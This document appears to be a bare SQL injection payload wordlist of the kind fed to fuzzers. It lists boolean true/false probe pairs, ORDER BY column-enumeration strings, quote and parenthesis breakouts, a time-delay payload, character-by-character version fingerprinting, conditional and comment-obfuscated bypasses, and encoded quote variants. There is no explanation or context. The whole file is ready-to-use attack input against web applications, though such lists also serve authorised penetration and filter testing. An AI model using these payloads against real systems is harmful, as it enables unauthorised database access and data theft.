 AND 1083=1083 AND ('1427=1427
 AND 1083=1083 AND (1427=1427
 AND 1=0
 AND 1=0 AND '%'='
 AND 1=0#
 AND 1=0-- 
 AND 1=1
 AND 1=1 AND '%'='
 AND 1=1#
 AND 1=1-- 
 AND 7300=7300 AND 'pKlZ'='pKlY
 AND 7300=7300 AND 'pKlZ'='pKlZ
 AND 7300=7300 AND ('pKlZ'='pKlY
 AND 7300=7300 AND ('pKlZ'='pKlZ
 AND 7506=9091 AND ('5913=5913
 AND 7506=9091 AND (5913=5913
 AS INJECTX WHERE 1=1 AND 1=0
 AS INJECTX WHERE 1=1 AND 1=0#
 AS INJECTX WHERE 1=1 AND 1=0--
 AS INJECTX WHERE 1=1 AND 1=1
 AS INJECTX WHERE 1=1 AND 1=1#
 AS INJECTX WHERE 1=1 AND 1=1--
 HAVING 1=0
 HAVING 1=0#
 HAVING 1=0-- 
 HAVING 1=1
 HAVING 1=1#
 HAVING 1=1-- 
 OR 1=0
 OR 1=0#
 OR 1=0-- 
 OR 1=1
 OR 1=1#
 OR 1=1-- 
 OR 3409=3409 AND ('pytW' LIKE 'pytW
 OR 3409=3409 AND ('pytW' LIKE 'pytY
 OR x=x
 OR x=x#
 OR x=x-- 
 OR x=y
 OR x=y#
 OR x=y-- 
 ORDER BY 1 
 ORDER BY 1# 
 ORDER BY 1-- 
 ORDER BY 10 
 ORDER BY 10# 
 ORDER BY 10-- 
 ORDER BY 11 
 ORDER BY 11# 
 ORDER BY 11-- 
 ORDER BY 12 
 ORDER BY 12# 
 ORDER BY 12-- 
 ORDER BY 13 
 ORDER BY 13# 
 ORDER BY 13-- 
 ORDER BY 14 
 ORDER BY 14# 
 ORDER BY 14-- 
 ORDER BY 15 
 ORDER BY 15# 
 ORDER BY 15-- 
 ORDER BY 16 
 ORDER BY 16# 
 ORDER BY 16-- 
 ORDER BY 17 
 ORDER BY 17# 
 ORDER BY 17-- 
 ORDER BY 18 
 ORDER BY 18# 
 ORDER BY 18-- 
 ORDER BY 19 
 ORDER BY 19# 
 ORDER BY 19-- 
 ORDER BY 2 
 ORDER BY 2# 
 ORDER BY 2-- 
 ORDER BY 20 
 ORDER BY 20# 
 ORDER BY 20-- 
 ORDER BY 21 
 ORDER BY 21# 
 ORDER BY 21-- 
 ORDER BY 22 
 ORDER BY 22# 
 ORDER BY 22-- 
 ORDER BY 23 
 ORDER BY 23# 
 ORDER BY 23-- 
 ORDER BY 24 
 ORDER BY 24# 
 ORDER BY 24-- 
 ORDER BY 25 
 ORDER BY 25# 
 ORDER BY 25-- 
 ORDER BY 26 
 ORDER BY 26# 
 ORDER BY 26-- 
 ORDER BY 27 
 ORDER BY 27# 
 ORDER BY 27-- 
 ORDER BY 28 
 ORDER BY 28# 
 ORDER BY 28-- 
 ORDER BY 29 
 ORDER BY 29# 
 ORDER BY 29-- 
 ORDER BY 3 
 ORDER BY 3# 
 ORDER BY 3-- 
 ORDER BY 30 
 ORDER BY 30#
 ORDER BY 30-- 
 ORDER BY 31337 
 ORDER BY 31337#
 ORDER BY 31337-- 
 ORDER BY 4 
 ORDER BY 4# 
 ORDER BY 4-- 
 ORDER BY 5 
 ORDER BY 5# 
 ORDER BY 5-- 
 ORDER BY 6 
 ORDER BY 6# 
 ORDER BY 6-- 
 ORDER BY 7 
 ORDER BY 7# 
 ORDER BY 7-- 
 ORDER BY 8 
 ORDER BY 8# 
 ORDER BY 8-- 
 ORDER BY 9 
 ORDER BY 9# 
 ORDER BY 9-- 
 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
 RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
 WHERE 1=1 AND 1=0
 WHERE 1=1 AND 1=0#
 WHERE 1=1 AND 1=0--
 WHERE 1=1 AND 1=1
 WHERE 1=1 AND 1=1#
 WHERE 1=1 AND 1=1--
 and (select substring(@@version,1,1))='M'
 and (select substring(@@version,1,1))='X'
 and (select substring(@@version,2,1))='i'
 and (select substring(@@version,2,1))='y'
 and (select substring(@@version,3,1))='S'
 and (select substring(@@version,3,1))='X'
 and (select substring(@@version,3,1))='c'
 or 7=7
 or 7=7#
 or 7=7)#
 or 7=7)-- 
 or 7=7-- 
"
" OR "" = "
" OR 1 = 1 -- -
" and 7=7
" or "z"="z
" or "z"="z" or "a"="b
" or 7=7
" or 7=7#
" or 7=7-- 
" or @version like "%
" or id like "%
" or user like "%
" or username like "%
" or version() like "%
""
"#
") or ("x"="x
")#
")) or (("x"="x
");#
"+"
","
"/**/or/**/"z"="z
"||"
#
#>
%
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
%00
%22
%27
%5c
&apos;
'
' '
' AND id IS NULL; --
' OR '' = '
' OR '1
' OR 'x'='x
' OR 1 -- -
' and 7=7
' and 7=7#
' and 7=7-- 
' or "
' or 'z'='z
' or 'z'='z' or 'a'='b
' or 7=7
' or 7=7#
' or 7=7-- 
' or @version like '%
' or id like '%
' or user like '%
' or username like '%
' or version() like '%
' waitfor delay '0:0:20'--
'#
''
'''''''''''''UNION SELECT '2
') or ('x'='x
')#
')) or (('x'='x
'))#
')))# 
')))-- 
')));-- 
'))--
'));# 
'));-- 
')--
');#
');-- 
'+'
','
'--
'.'
'/**/or/**/'z'='z
'='
'=0--+
'LIKE'
'||'
()
(select )
(select 1)
(select from dual)
*/
*1
+
,
,@@version
,version()
-- -
-- or # 
-->
-0
-2
/
/*
/*_*/
/*x*/
/*…*/ 
//
1 and 7=7
1 or 7=7
1*56
1-false
1-true
;
;%00
@@variable
@@version
@variable
AND 0
AND 1
AND false
AND true
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
\
\"
\" and 7=7#
\" and 7=7--
\'
\' and 7=7#
\' and 7=7--
\\
`
``
as
asc
bfilename
delete
desc
distinct
handler
having
insert
like
limit
or
order by
procedure
replace
select
to_timestamp_tz
truncate
tz_offset
update
version()
|0
||
À¢
À§
Ä¢
Ä§
Å
ï¹¨
ï¼
ï¼
ï¼¼
